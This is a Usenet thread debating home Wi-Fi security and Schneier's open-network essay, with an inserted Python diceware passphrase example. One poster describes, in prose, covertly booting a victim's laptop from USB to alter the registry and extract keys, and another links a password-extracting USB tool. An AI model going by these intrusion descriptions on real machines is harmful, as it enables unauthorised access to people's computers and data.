* Use WPA security. If you don't do this, assume you will get hacked.
WEP is essentially worthless. Replace wireless equipment that doesn't
support WPA. Seriously. (See Wi-Fi Security)
* Use a strong WPA passphrase. A good way to do that is with diceware
words. (See What Makes for a Strong Password or Passphrase?) Write your
passphrase on a label and stick it on the bottom of your wireless router
so you won't forget it. (If someone gets to your wireless router, you
are compromised regardless.)
* Make your wireless SSID unique. This helps avoid network collisions. A
good way to do this is to use your address, phone number, and/or name
for your SSID (making it easy for you to be contacted if something is
wrong with your wireless network).
* Don't bother with SSID hiding or MAC address filtering. They don't do
any real good (improve security) but they can cause you grief. (See
Wi-Fi Security Myths)
* Turn off Universal Plug and Play (UPnP) in your wireless router.
Because most consumer-grade wireless routers lack UPnP authentication
they are vulnerable to attack. (See Problems with UPnP, Lack of
Authentication)
* Set a strong password on the administration interface of your wireless
router. Again, diceware is a good way to do that.
* Turn off remote administration. If your wireless router supports
remote administration, turn it off (unless you really know what you're
doing).
* On unsecured Wi-Fi use VPN (Virtual Private Networking). Otherwise
your wireless traffic can be snooped and compromised. (See Secure
Internet access in a public hotspot)
--
Best regards,
John Navas
FAQ for Wireless Internet: <http://wireless.navas.us>
FAQ for Wi-Fi: <http://wireless.navas.us/wiki/Wi-Fi>
Wi-Fi How To: <http://wireless.navas.us/wiki/Wi-Fi_HowTo>
Fixes to Wi-Fi Problems: <http://wireless.navas.us/wiki/Wi-Fi_Fixes>
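As an added illustration of the diceware passphrase advice in the list above (example code written for this page, not from John Navas's FAQ or anyone in the thread), the following Python maps five-dice rolls to wordlist entries, computes the entropy of an n-word passphrase, and checks the result against the WPA-PSK passphrase limits of 8 to 63 printable ASCII characters. The embedded wordlist is a constructed 24-word sample standing in for a real 7776-word Diceware list, which is why the entropy figures for the sample list come out so low.

```python
import math
import secrets

# Constructed sample wordlist so the block runs offline. A real Diceware list
# holds 6**5 = 7776 words, one per five-dice roll, so each word chosen from it
# adds log2(7776), about 12.9 bits, of entropy.
SAMPLE_WORDLIST = [
    "abacus", "basket", "candle", "dragon", "eagle", "falcon", "garden", "hammer",
    "island", "jacket", "kettle", "lantern", "magnet", "needle", "orange", "pencil",
    "quartz", "rocket", "saddle", "tunnel", "umbrella", "violin", "walnut", "yogurt",
]

DICEWARE_LIST_SIZE = 6 ** 5  # 7776 entries in a standard Diceware list

# WPA/WPA2-PSK passphrase rules: 8 to 63 characters, printable ASCII only.
WPA_MIN_LEN = 8
WPA_MAX_LEN = 63


def dice_roll_to_index(roll: str) -> int:
    """Map a five-dice Diceware roll such as '11111' or '66666' to a 0-based
    wordlist index. Each die is a base-6 digit with values 1..6."""
    if len(roll) != 5 or any(ch not in "123456" for ch in roll):
        raise ValueError(f"invalid Diceware roll: {roll!r}")
    index = 0
    for ch in roll:
        index = index * 6 + (int(ch) - 1)
    return index


def entropy_bits(n_words: int, list_size: int) -> float:
    """Entropy of a passphrase of n_words drawn uniformly from list_size words."""
    return n_words * math.log2(list_size)


def words_needed(list_size: int, target_bits: float) -> int:
    """Smallest word count from a list of list_size words that reaches target_bits."""
    return math.ceil(target_bits / math.log2(list_size))


def generate_passphrase(wordlist, n_words: int = 6, sep: str = " ") -> str:
    """Pick n_words with the OS CSPRNG (secrets), the software stand-in for
    rolling physical dice. random.choice is not suitable for this."""
    return sep.join(secrets.choice(wordlist) for _ in range(n_words))


def check_wpa_passphrase(passphrase: str):
    """Return (ok, reason) according to the WPA-PSK passphrase rules."""
    if not WPA_MIN_LEN <= len(passphrase) <= WPA_MAX_LEN:
        return False, f"length {len(passphrase)} outside {WPA_MIN_LEN}..{WPA_MAX_LEN}"
    if any(not 32 <= ord(ch) <= 126 for ch in passphrase):
        return False, "contains non-printable or non-ASCII characters"
    return True, "ok"


if __name__ == "__main__":
    phrase = generate_passphrase(SAMPLE_WORDLIST, 6)
    print("sample passphrase:", phrase, check_wpa_passphrase(phrase))
    print("6 words from the 24-word sample list:",
          round(entropy_bits(6, len(SAMPLE_WORDLIST)), 1), "bits")
    print("6 words from a real Diceware list:",
          round(entropy_bits(6, DICEWARE_LIST_SIZE), 1), "bits")
    print("Diceware words needed for 80 bits:",
          words_needed(DICEWARE_LIST_SIZE, 80))
```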
<http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
John
>Interesting counter point to securing your wireless
><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
Bruce Schneier is a well regarded author of criticism on security
issues. He's made a career of writing articles, columns, and two
books on the topic. Scan the list of titles and tell me if you see a
pattern:
<http://www.schneier.com/essays.html>
I'll be blunt (because I'm in a hurry to leave for a free lunch).
Whom would you prefer to believe? The person that has to make the
stuff work and keep the paying customers safe and happy? Or the
professional author and critic that takes pot shots at the industry's
attempts to get it right? Pick one.
Do you subscribe to this manner of FUD (fear uncertainty doubt):
"This is not to say that the new wireless security protocol,
WPA, isn't very good. It is. But there are going to be
security flaws in it; there always are."
Swell. Leave your access point wide open because your neighbors might
need it and because your chances of experiencing a problem are minimal.
Never mind with encryption because it *MIGHT* be cracked in the
future. While you're at it, leave your car doors unlocked for the
same reasons. Door locks are easily picked, so why bother to use
them.
Incidentally, the real danger is not DMCA or spammers. It's someone
giving themselves a tour of your computer, grabbing whatever seems
interesting, because an overwhelming number of machines are running
open shares and zero local security (i.e. passwords). Since the
wireless LAN is behind the router, the firewall offers zero
protection.
More later....
--
Jeff Liebermann je...@cruzio.com
150 Felker St #D http://www.LearnByDestroying.com
Santa Cruz CA 95060 http://802.11junk.com
Skype: JeffLiebermann AE6KS 831-336-2558
Well since he is CTO of BT Counterpane I would say he and his company
are in the business of making security work.
I thought the most important part of the article was
"If I configure my computer to be secure regardless of the network
it's on, then it simply doesn't matter. And if my computer isn't secure
on a public network, securing my own network isn't going to reduce my
risk very much.
Yes, computer security is hard. But if your computers leave your house,
you have to solve it anyway. And any solution will apply to your desktop
machines as well. "
>
> Do you subscribe to this manner of FUD (fear uncertainty doubt):
> "This is not to say that the new wireless security protocol,
> WPA, isn't very good. It is. But there are going to be
> security flaws in it; there always are."
> Swell. Leave your access point wide open because your neighbors might
> need it and because your chances of experiencing a problem are minimal.
> Never mind with encryption because it *MIGHT* be cracked in the
> future. While you're at it, leave your car doors unlocked for the
> same reasons. Door locks are easily picked, so why bother to use
> them.
>
> Incidentally, the real danger is not DMCA or spammers. It's someone
> giving themselves a tour of your computer, grabbing whatever seems
> interesting, because an overwhelming number of machines are running
> open shares and zero local security (i.e. passwords). Since the
> wireless LAN is behind the router, the firewall offers zero
> protection.
>
> More later....
>
John
I recently acquired a 2wire 2701HG-B to get around issues with my
crappy (free) Creative Briteport DSL modem. I still use my linksys
WRT330N for wifi and my lan, but technically I could turn on the wifi
on the 2701HG-B. I make the linksys be the DMZ of the 2wire box. But I
believe that means my LAN and wifi on the linksys are behind its own
firewall, so enabling open wifi on the 2wire would be safe.
I have some Gemtek P-560s I considered installing on the router ports
of the 2wire to give me another level of protection.
Is there some website that hosts manuals on discontinued wifi gear,
much like the boat anchor website does for test gear? I have the CD-ROM
that comes with the P-560. It seems Gemtek doesn't maintain
documentation on discontinued products.
Correction: they're in the business of /selling/ security solutions to
people.
When your business is selling a cure for X, it's a useful marketing tool
to make people worried that X is a risk. And it's especially useful to
hint that it's really hard to fix - it helps justify one's fees.... :-)
I mean, if the guy down the vehicle repair shop went around telling
everyone it was easy to change the head gasket, who would bother taking
the car in? So he sucks his teeth, mumbles about it being hard to get
the parts, it's tricky on these older models because the flange baffle
retaining plate is obscured by the grommet recycling arm, he'll need a
special tool which he'll have to charge for etc etc.
> I thought the most important part of the article was
>
> "If I configure my computer to be secure regardless of the network it's
> on, then it simply doesn't matter. And if my computer isn't secure on a
> public network, securing my own network isn't going to reduce my risk
> very much.
Euh, that says nothing. I'd call it a platitude.
> Interesting counter point to securing your wireless
>
> <http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
Yeah, well, there will always be tree-huggers and wing-nuts and women
who don't shave their pits and practice aromatherapy.
I catch Schneier downloading spanking videos in front of my house, I'll
ram a rottweiler up his ass. Irresponsible wanking.
My house is private, it's not a hotel or a motel or a brothel or a
Starbucks and I have a very secure WPA password. If we have guests who want
to use it, I give them the password. It's pretty simple really. The
next-door neighbour who I trust fully also has the password in case his
network goes down; he does the same for me (he's using WEP which I can
crack if I want anyway). Although, we have the same ISP, so it's kind of
a useless exercise in neighbourly admiration.
That's the worst fucking article I've ever read in Wired.
--
W. Oates
> It's someone
> giving themselves a tour of your computer, grabbing whatever seems
> interesting, because an overwhelming number of machines are running
> open shares and zero local security (i.e. passwords). Since the
> wireless LAN is behind the router, the firewall offers zero
I might add that my local "shares" are nicely and tightly protected too
(it's a Mac, we don't really talk that way). My next step is to separate
the wireless (guests and the neighbour), put it on a separate route (if
that's how you say it) from the wire (me and the oul' Woman and the tv).
--
W. Oates
>On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
><notv...@cox.net.invalid> wrote:
>
>>Interesting counter point to securing your wireless
>><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>
>Bruce Schneier is a well regarded author of criticism on security
>issues. He's made a career of writing articles, columns, and two
>books on the topic. Scan the list of titles and tell me if you see a
>pattern:
><http://www.schneier.com/essays.html>
>
>I'll be blunt (because I'm in a hurry to leave for a free lunch).
>Whom would you prefer to believe? The person that has to make the
>stuff work and keep the paying customers safe and happy? Or the
>professional author and critic that takes pot shots at the industry's
>attempts to get it right? Pick one.
In a vacuum, I would tend to pick the professional over the repairman,
but I hope one wouldn't have to pick in a vacuum.
>Do you subscribe to this manner of FUD (fear uncertainty doubt):
> "This is not to say that the new wireless security protocol,
> WPA, isn't very good. It is. But there are going to be
> security flaws in it; there always are."
I don't think that qualifies as FUD. Not even close.
>Swell. Leave your access point wide open because your neighbors might
>need it and because your chances of experiencing a problem are minimal.
>Never mind with encryption because it *MIGHT* be cracked in the
>future. While you're at it, leave your car doors unlocked for the
>same reasons. Door locks are easily picked, so why bother to use
>them.
I'm not sure how you arrived at your conclusion, but I suspect it had
a lot to do with your mind being on the free lunch. :)
Pointing out that something isn't perfect is a far cry from advising
people not to use it.
>On Fri, 28 Nov 2008 12:11:32 -0800, Jeff Liebermann <je...@cruzio.com>
>wrote:
>
>>On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
>><notv...@cox.net.invalid> wrote:
>>
>>>Interesting counter point to securing your wireless
>>><http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>>
>>Bruce Schneier is a well regarded author of criticism on security
>>issues. He's made a career of writing articles, columns, and two
>>books on the topic. Scan the list of titles and tell me if you see a
>>pattern:
>><http://www.schneier.com/essays.html>
>>
>>I'll be blunt (because I'm in a hurry to leave for a free lunch).
>>Whom would you prefer to believe? The person that has to make the
>>stuff work and keep the paying customers safe and happy? Or the
>>professional author and critic that takes pot shots at the industry's
>>attempts to get it right? Pick one.
>
>In a vacuum, I would tend to pick the professional over the repairman,
>but I hope one wouldn't have to pick in a vacuum.
Well, I screwed up several times here.
I try to never judge the source, only the content. However, I shoved
my foot in my mouth and managed to criticize the source instead of the
content. I'll try not to repeat my mistake.
About 2 years ago, I declared (in this newsgroup) that I would never
get involved in another security discussion. Well, I blew it and did.
Too late. The problem is that in such discussions, there is no right
answer. There's no "do this and you'll be secure". There's only best
effort, due diligence, perpetual vigilance, and reading endless pages
of boring log files. What works well today is tomorrow's security
hole.
John Navas posted what I consider to be a good minimal list of
security measures. None of the items listed are perfect, none will be
eternally secure, and none offer a guarantee. When someone offers a
better list of basic security measures, I might consider recommending
an update to the security essentials. Note that John's Wiki is
open to public comments and additions. If you don't like it, change
it, or preferably add to it.
Instead of pounding on the solution, perhaps it would be helpful to
explain the problem. (Incidentally, this is my pet peeve). Wireless
routers are shipped insecure by default. Take any router out of the
box, plug it in, do NOTHING, and unless you have AT&T DSL which
requires a PPPoE login and password, you're online and on the air.
This is great for the customer "out of the box experience" and a total
disaster for security. Despite the deluge of articles on wireless
security, most customers still don't have a clue. Obviously,
something is not working. I have often suggested that manufacturers
adopt the method used by 2wire, which requires setting up a login
password and creates a unique SSID and WEP/WPA password, or you don't
get to use the router.
If the customer absolutely has to run a wide open system, as in a
coffee shop, then by all means, let them. However, the default setup
should be locked up tight, with passwords and encryption at every
turn.
So, rather than solve the problem, we have this brilliant head of a
security company, offer that the solution is to ignore the problem
completely, and just run a wide open system on the basis of the odds
being in favor of nothing bad happening. He's right, in that one can
get away with doing almost anything, but only for a short while.
Eventually bad karma and stupidity catch up.
(Incidentally: In college, I had a class in traffic engineering. One
of the fun exercises was to calculate and later model the probability
of a head-on collision by driving the wrong way up various road types
and traffic densities. Under certain conditions, one can go for a
surprisingly long time before meeting the inevitable).
As for the repairman versus the professional (insert title), my
preferences tend to vary. Next time you have a problem with your
automobile, try asking an automotive engineer for a usable solution.
I've actually done this. I think you'll find that the repairman knows
more about how to fix the car than the designer. If you're concerned
about my status as a repairman, be advised that I have 3 small medical
offices as customers that require HIPAA security compliance. In my
admittedly limited experience, there's nothing wrong with the
technology. It's how it's used that tends to cause problem. Fixing
that is where the repairman is required.
>>Do you subscribe to this manner of FUD (fear uncertainty doubt):
>> "This is not to say that the new wireless security protocol,
>> WPA, isn't very good. It is. But there are going to be
>> security flaws in it; there always are."
>
>I don't think that qualifies as FUD. Not even close.
I usually ignore one line pontification and judgments, but since I
asked for an opinion, I won't complain. However, you're wrong. What
Bruce Schneier has done here is classical FUD. In his first sentence,
he compliments WPA and re-affirms that it is good. As a side point,
note that he uses two negatives in that statement. The
statement is positive, but the sentence construction makes it not so
definite. He then goes on to announce that there are going to be
problems (without stating what problems) with WPA, for no better
reason than there are always problems. Well, if it's not FUD, it's
certainly defeatist.
Now, permit me to explain WHY he's doing that. I do the same thing
when I have a difficult customer. Instead of promoting my points and
recommendations, I proceed to tear down literally everything
available. It doesn't matter what hardware or software is on the
table, I can find something that *MIGHT* be wrong with it. Note that
I don't need to actually find something wrong, just potentially wrong.
When I'm done, there's nothing left to choose from. By default, I get
to do what I proposed in the first place. Bruce Schneier couldn't
find anything specifically wrong with WPA, so the best he could do was
imply that there *MIGHT* be something wrong. That's FUD methinks.
>>Swell. Leave your access point wide open because your neighbors might
>>need it and because your chances of experiencing a problem are minimal.
>>Never mind with encryption because it *MIGHT* be cracked in the
>>future. While you're at it, leave your car doors unlocked for the
>>same reasons. Door locks are easily picked, so why bother to use
>>them.
>
>I'm not sure how you arrived at your conclusion, but I suspect it had
>a lot to do with your mind being on the free lunch. :)
Ummm... I didn't write a conclusion. The quoted paragraph is a
cynical and sarcastic recommendation. That's my normal mode of
operation and does not require the diversion of a free lunch, which
incidentally was marginal at best. I did get to play with several
Asus eee PC 700 and 900 notebooks. I want one (even if I couldn't
type on the keyboard).
The part about leaving the car door open is called an analogy. Leave
the WPA security disabled because it might be cracked. Leave the car
unlocked because the door locks might be picked. All analogies break
down under sufficient scrutiny, but methinks these are sufficiently
close to survive.
>Pointing out that something isn't perfect is a far cry from advising
>people not to use it.
Did you read the article? Bruce Schneier never actually came out and
recommended that one should not use wireless security. Yet the entire
article is all about how wonderful and easy things are without that
horribly difficult wireless security, and how successful he and others
have been running a wide open system. There are even recommendations of
replacement firmware to make it easier. It's kinda like that with
many forms of display advertising. One never ever suggests that the
listener or viewer should actually buy something. One just shows a
wonderful picture of how happy they will be if they happen to have the
product. (Full Disclosure: I have an ancient advertising and
marketing background).
>Jeff Liebermann wrote:
>> On Fri, 28 Nov 2008 14:27:06 -0500, John Mason Jr
>> <notv...@cox.net.invalid> wrote:
>>
>>> Interesting counter point to securing your wireless
>>> <http://www.wired.com/politics/security/commentary/securitymatters/2008/01/securitymatters_0110>
>>
>> Bruce Schneier is a well regarded author of criticism on security
>> issues. He's made a career of writing articles, columns, and two
>> books on the topic. Scan the list of titles and tell me if you see a
>> pattern:
>> <http://www.schneier.com/essays.html>
>>
>> I'll be blunt (because I'm in a hurry to leave for a free lunch).
>> Whom would you prefer to believe? The person that has to make the
>> stuff work and keep the paying customers safe and happy? Or the
>> professional author and critic that takes pot shots at the industry's
>> attempts to get it right? Pick one.
>
>Well since he is CTO of BT Counterpane I would say he and his company
>are in the business of making security work.
Have you ever worked with a security company? I have. There are an
amazingly wide range of business functions that can be performed by a
security company. It can be code audits, access control, permissions,
authorization, authentication, identity management, external security,
physical security, patch management, site monitoring, access devices,
HIPAA, FASP, log rolling, etc. I probably forgot a few items.
<http://bt.counterpane.com>
Looks like they do all those and then some. Yep, they're definitely
qualified.
Impressive list of principals, but missing Bruce Schneier:
<http://bt.counterpane.com/team.html>
So, why does he recommend *LESS* wireless security? Did I miss
something here?
>I thought the most important part of the article was
>
> "If I configure my computer to be secure regardless of the network
>it's on, then it simply doesn't matter. And if my computer isn't secure
>on a public network, securing my own network isn't going to reduce my
>risk very much.
Baloney. I could have an adequately secured computah (personal
firewall) and still have problems. For example, sending un-encrypted
email and passwords (POP3, SMTP, FTP) that are sniffable via wireless
or an ethernet tap. The computer is secure, but the transport
mechanism is not.
>Yes, computer security is hard. But if your computers leave your house,
>you have to solve it anyway. And any solution will apply to your desktop
>machines as well. "
Well, yeah. A laptop is nothing more than a small desktop with a
built in UPS (battery). Desktops, laptops, and PDAs should be
treated in the same way when dealing with security. Few are.
>John
In part of the article he states he doesn't believe that it is much of a
risk that his wireless will be abused
>
>> I thought the most important part of the article was
>>
>> "If I configure my computer to be secure regardless of the network
>> it's on, then it simply doesn't matter. And if my computer isn't secure
>> on a public network, securing my own network isn't going to reduce my
>> risk very much.
>
> Baloney. I could have an adequately secured computah (personal
> firewall) and still have problems. For example, sending un-encrypted
> email and passwords (POP3, SMTP, FTP) that are sniffable via wireless
> or an ethernet tap. The computer is secure, but the transport
> mechanism is not.
I would consider fixing those type of problems part of making sure that
your computer is safe on a public network.
>
>> Yes, computer security is hard. But if your computers leave your house,
>> you have to solve it anyway. And any solution will apply to your desktop
>> machines as well. "
>
> Well, yeah. A laptop is nothing more than a small desktop with a
> built in UPS (battery). Desktops, laptops, and PDAs should be
> treated in the same way when dealing with security. Few are.
>
I agree
>> John
>
>In part of the article he states he doesn't believe that it is much of a
>risk that his wireless will be abused
In a previous posting in this thread, I mentioned what happened when I
was running an open access point in my office. Local homeless in
campers would park outside my office making VoIP phone calls. Not a
problem, but this idiot told all his friends and my (shared) bandwidth
was soon swamped. I turned on encryption and that was the end of my
experiment in openness.
>> Baloney. I could have an adequately secured computah (personal
>> firewall) and still have problems. For example, sending un-encrypted
>> email and passwords (POP3, SMTP, FTP) that are sniffable via wireless
>> or an ethernet tap. The computer is secure, but the transport
>> mechanism is not.
>I would consider fixing those type of problems part of making sure that
>your computer is safe on a public network.
Part of that might be fixing the authors original statement. His
contention was (in my words) that if his computer was secure, then he
has nothing to worry about in a public unencrypted system. He's wrong
because of sniffing problems. Ask any user in a coffee shop if their
POP3, SMTP, and FTP passwords are encrypted or not. I've done this
and got the predictable blank looks. I know quite a few ISP's that
still use unencrypted passwords, with no provisions for SSL, TLS, or
VPN terminations.
>> Well, yeah. A laptop is nothing more than a small desktop with a
>> built in UPS (battery). Desktops, laptops, and PDAs should be
>> treated in the same way when dealing with security. Few are.
>I agree
Something is wrong here. Nobody ever agrees with me. Are you sure?
I have 5 VPN clients on my Verizon XV6700 cell phone running Windoze
Mobile 5. All of them sorta work, with specific terminating servers.
None of them work with all the different VPN boxes and servers I have
to connect. I've given up and gone back to dragging my giant laptop
around. However, I was lusting after an Asus eeePC 900 today, and
just might buy one. Small is beautiful.
Incidentally, I have an impromptu hacking demonstration today. I shut
down the victim's laptop (allegedly accidentally). When nobody's
looking, I shove in a USB dongle with a bootable Linux system
including various registry hacking utilities. I scripted one of them
to make a few key changes to the registry, and to extract a few
interesting keys. Most modern laptops will boot from USB, especially
if I hit F10(?) during the bootup to select the boot device. The rest
is trivial. Elapsed time is about 3 minutes, not including a 2nd
reboot. Perhaps the author would like to revise his position on
computer hardware security to include physical security?
I'm only a repairman. Imagine what a real hacker can do.
> ... rather than solve the problem, we have this brilliant head of a
> security company, offer that the solution is to ignore the problem
> completely, and just run a wide open system on the basis of the odds
> being in favor of nothing bad happening. He's right, in that one can
> get away with doing almost anything, but only for a short while.
> Eventually bad karma and stupidity catch up.
Based on the above, I think that you have mis-understood the article
in question. Schneier makes the point that what he's trying to protect
(as are most people) is his computer(s), and the data on it(them).
His effort, therefore, is better spent applying security mechanisms on
the computer itself, rather than trying to "protect" access to his network
(which, incidentally, he seems perfectly willing to just share).
As an analogy, consider the locks on the doors and windows of a house:
if you move into a gated-community, you're likely going to still want
locks on your doors and windows. Schneier's point (applied to this
analogy), isn't that you shouldn't move into a gated community, but
rather that you should protect your house and its contents by applying
security measures (locks on doors and windows) directly to the house.
You can take it as a given that at some time, someone who doesn't belong
in the gated community will find a way in.
Especially with a mobile computer, given that you are more likely to use
such a computer on a network that is outside of your control (and that
has other users you likely don't know and shouldn't trust), there needs
to be strong effort placed on protecting the computer itself, and its
data. That protection comes from end-to-end encryption (https, imaps,
ssh, TLS/SSL, etc.), not from WEP/WPA/WPA2/802.11i, etc.
> ... Bruce Schneier couldn't find anything specifically wrong with
> WPA, so the best he could do was imply that there *MIGHT* be something
> wrong. That's FUD methinks.
Again, I think you've misunderstood his point: When WEP was introduced, it
was touted as providing security that was equivalent to wired networking.
That turned out (after some time) not to be true. Schneier's point
isn't that there "might" be something wrong with WPA (or WPA2), it's
that regardless of whether there is a known weakness with it now,
as technology improves, the computing power that can be put towards
brute-force attacks (and ultimately more calculated attacks) increases,
and therefore the degree of security offered by technology that's "good
enough" today decreases.
If you think it's all FUD, consider the following (as one example):
http://hothardware.com/News/Russian-Firm-Uses-NVIDIA-GPUs-To-Crack-WPA-WPA2/
Schneier's preference is for "easy" access to the network. He claims to
like it that way. However, his point is that trying to protect the data
on the computer by attempting to secure access to the network is the
wrong way to go about it (and in some cases might be seen as duplicated
effort). See Bill Cheswick's paper on the design of Internet gateways
(which a wireless access point can ultimately be) for another
(compatible) explanation (that predates wireless networking; although
the details of the technology have changed, the points are still valid,
and on a broad scale we have not yet appeared to have learned them):
http://www.cheswick.com/ches/papers/gateway.pdf
> The part about leaving the car door open is called an analogy. Leave
> the WPA security disabled because it might be cracked.
That isn't at all Schneier's point. Leave WPA disabled, because he
prefers to share the network access. And by the way, even if WPA is
considered a suitable way to secure access to your network at the moment,
don't count on it to secure the data on your computer. Referring back
to my earlier analogy, that would be like counting on the locked gate at
the end of the street to protect your home from being entered by
unwelcome strangers.
> ... Bruce Schneier never actually came out and recommended that one
> should not use wireless security. Yet the entire article is all about
> how wonderful and easy things are without that horribly difficult
> wireless security, and how successful he and others have been running
> wide open system. ...
He's not worrying about securing his wireless network because he's
comfortable with how well the computers he has on that network are
secured. The effort he invested in securing his computers is returned
to him in his ability to not worry about the odd stranger using his
wireless network (as someone might take a walk down the street of a
gated community).
Now, having said all of that, I keep my own wireless network secured,
but all the computers I have that either use it, or are accessible from
it, also are secured as well as they can be. I don't count on the
wireless security to protect my computers, but I do expect that it will
keep most uninvited strangers from using my network.
--
----------------------------------------------------------------------
Sylvain Robitaille s...@alcor.concordia.ca
Systems analyst / AITS Concordia University
Faculty of Engineering and Computer Science Montreal, Quebec, Canada
----------------------------------------------------------------------
> Incidentally, I have an impromptu hacking demonstration today. I shut
> down the victim's laptop (allegedly accidentally). When nobody's
> looking, I shove in a USB dongle with a bootable Linux system
> including various registry hacking utilities. I scripted one of them
> to make a few key changes to the registry, and to extract a few
> interesting keys. Most modern laptops will boot from USB, especially
> if I hit F10(?) during the bootup to select the boot device. The rest
> is trivial. Elapsed time is about 3 minutes, not including a 2nd
> reboot. Perhaps the author would like to revise his position on
> computer hardware security to include physical security?
Most (all?) modern laptops also provide a means to set a password to
control access to the boot-sequence configuration, or in some cases to
boot the computer at all. Your demonstration would fail on my laptop
(notwithstanding that it wouldn't even find Windows on it), and if you
understood the point of the author's (Schneier's) article, you would
understand that you would have the same problem with *his* laptop.
The network access point (wireless or otherwise) provides access to the
network, not "security". That's the point I read in the article being
discussed.
>On Fri, 28 Nov 2008 19:27:17 -0600, Char Jackson <no...@none.invalid>
>wrote:
>
>>On Fri, 28 Nov 2008 12:11:32 -0800, Jeff Liebermann <je...@cruzio.com>
>>wrote:
>>
>>>I'll be blunt (because I'm in a hurry to leave for a free lunch).
>>>Whom would you prefer to believe? The person that has to make the
>>>stuff work and keep the paying customers safe and happy? Or the
>>>professional author and critic that takes pot shots at the industry's
>>>attempts to get it right? Pick one.
>>
>>In a vacuum, I would tend to pick the professional over the repairman,
>>but I hope one wouldn't have to pick in a vacuum.
>
>Well, I screwed up several times here.
I thought I did that once, but I was mistaken. ;-)
>As for the repairman versus the professional (insert title), my
>preferences tend to vary. Next time you have a problem with your
>automobile, try asking an automotive engineer for a usable solution.
>I've actually done this. I think you'll find that the repairman knows
>more about how to fix the car than the designer.
Well, of course, if you're looking for repair advice the repairman is
likely to know more, but your question above was a much more generic
"whom would you believe". Since your preferences vary, I assume you
agree with me at least part of the time that the professional
(professional WHAT?) is likely to be the better source sometimes.
>>>Do you subscribe to this manner of FUD (fear uncertainty doubt):
>>> "This is not to say that the new wireless security protocol,
>>> WPA, isn't very good. It is. But there are going to be
>>> security flaws in it; there always are."
>>
>>I don't think that qualifies as FUD. Not even close.
>
>I usually ignore one line pontification and judgments, but since I
>asked for an opinion, I won't complain. However, you're wrong. What
>Bruce Schneier has done here is classical FUD.
FUD is fear, uncertainty, and doubt. I may be wrong, or you may be
wrong, but my opinion is that the part you quoted above doesn't
contain any of those three qualities. I'm able to parse the quoted
statements and understand that he's saying WPA is good, but not likely
to be perfect. I don't know when it was written, but we know now that
WPA has security flaws, so he was either right in advance or right in
arrears, but either way he is/was right. Just like truth is the best
defense against libel, I think truth is a pretty darn strong defense
against a claim of FUD.
>>>Swell. Leave your access point wide open because your neighbors might
>>>need it and because your chances of experiencing a problem is minimal.
>>>Never mind with encryption because it *MIGHT* be cracked in the
>>>future. While you're at it, leave your car doors unlocked for the
>>>same reasons. Door locks are easily picked, so why bother to use
>>>them.
>>
>>I'm not sure how you arrived at your conclusion, but I suspect it had
>>a lot to do with your mind being on the free lunch. :)
>
>Ummm... I didn't write a conclusion. The quoted paragraph is a
>cynical and sarcastic recommendation.
Your conclusion was that since WPA may or does have problems, we
should just avoid it entirely. Like I said, I don't see how you
arrived at that conclusion, or whatever you'd rather call it. That
'position' certainly doesn't follow the quoted paragraph that came
before it, so now I'm assuming that you were responding to something
else from that article that you didn't feel was worth quoting.
>The part about leaving the car door open is called an analogy.
Yes, analogies are common. No need to point them out.
>Leave the WPA security disabled because it might be cracked.
See? THAT! How did you arrive there? Besides you, who else suggested
it would be a good idea to leave WPA disabled because it might be
cracked? If not from you, did you get it from the article? That's
really all I'm asking.
>>Pointing out that something isn't perfect is a far cry from advising
>>people not to use it.
>
>Did you read the article?
No, I was responding to what you wrote, not to what someone wrote in
an article. You didn't make it clear that I had to read the article
before climbing onto the ride. :)
Trouble is, leaving your network open is like letting someone else run a
FREIGHT TRAIN through your suburban back yard.
All this hand waving about security fails to take bandwidth consumption into
account. Beyond securing your own resources (and privacy of your network
traffic) is making sure the bandwidth you pay for is the bandwidth you get.
Not gobbled up by some nitwit downloading tremendous amounts, or a spam
botnet inundating everyone else with junk e-mail.
Goes back to the age-old problem of needing to know about and understand
the risks to be able to make an appropriate decision.
>
>>> Well, yeah. A laptop is nothing more than a small desktop with a
>>> built in UPS (battery). Desktops, laptops, and PDA's should be
>>> treated in the same way when dealing with security. Few are.
>
>> I agree
>
> Something is wrong here. Nobody ever agrees with me. Are you sure?
Yes
>
> I have 5 VPN clients on my Verizon XV6700 cell phone running Windoze
> Mobile 5. All of them sorta work, with specific terminating servers.
> None of them work with all the different VPN boxes and servers I have
> to connect. I've given up and gone back to dragging my giant laptop
> around. However, I was lusting after an Asus eeePC 900 today, and
> just might buy one. Small is beautiful.
>
> Incidentally, I have an impromptu hacking demonstration today. I shut
> down the victim's laptop (allegedly accidentally). When nobody's
> looking, I shove in a USB dongle with a bootable Linux system
> including various registry hacking utilities. I scripted one of them
> to make a few key changes to the registry, and to extract a few
> interesting keys. Most modern laptops will boot from USB, especially
> if I hit F10(?) during the bootup to select the boot device. The rest
> is trivial. Elapsed time is about 3 minutes, not including a 2nd
> reboot. Perhaps the author would like to revise his position on
> computer hardware security to include physical security?
>
> I'm only a repairman. Imagine what a real hacker can do.
>
>
If you don't want to shut the machine down:
<http://wiki.hak5.org/wiki/USB_Switchblade>
If you have local access to the machine and can control the boot up
there are many ways to own it, but if data is properly protected the
threat is mitigated
John
>Jeff Liebermann wrote:
>> I'll be blunt (because I'm in a hurry to leave for a free lunch).
>> Whom would you prefer to believe? The person that has to make the
>> stuff work and keep the paying customers safe and happy? Or the
>> professional author and critic that takes pot shots at the industry's
>> attempts to get it right? Pick one.
>I thought the most important part of the article was
>
> "If I configure my computer to be secure regardless of the network
>it's on, then it simply doesn't matter. And if my computer isn't secure
>on a public network, securing my own network isn't going to reduce my
>risk very much.
>
>Yes, computer security is hard. But if your computers leave your house,
>you have to solve it anyway. And any solution will apply to your desktop
>machines as well. "
It's simply not possible to "configure my computer to be secure
regardless of the network it's on" -- any computer on a network is
insecure, period.
Arguing that it's OK to leave the network open because the computer is
secure is a bit like arguing that there's no need to drive safely when
wearing a seatbelt.
>Schneier makes the point that what he's trying to protect
>(as are most people) is his computer(s), and the data on it(them).
>His effort, therefore, is better spent applying security mechanisms on
>the computer itself, rather than trying to "protect" access to his network
>(which, incidentally, he seems perfectly willing to just share).
As I've mentioned several times, the computer can be almost totally
protected, but without encrypting the wireless traffic, a simple
